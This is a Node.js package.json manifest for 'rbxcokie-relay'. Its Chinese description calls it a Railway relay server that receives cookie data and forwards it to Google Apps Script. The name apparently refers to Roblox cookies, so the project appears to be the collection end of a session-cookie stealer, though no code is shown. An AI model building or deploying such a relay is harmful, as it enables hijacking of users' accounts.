{
  "name": "rbxcokie-relay",
  "version": "1.0.0",
  "description": "Railway 中轉伺服器 — 接收 Cookie 資料並轉發至 Google Apps Script",
  "main": "server.js",
  "scripts": {
    "start": "node server.js"
  },
  "dependencies": {
    "express": "^4.18.2",
    "node-fetch": "^2.7.0"
  },
  "engines": {
    "node": ">=18.0.0"
  }
}
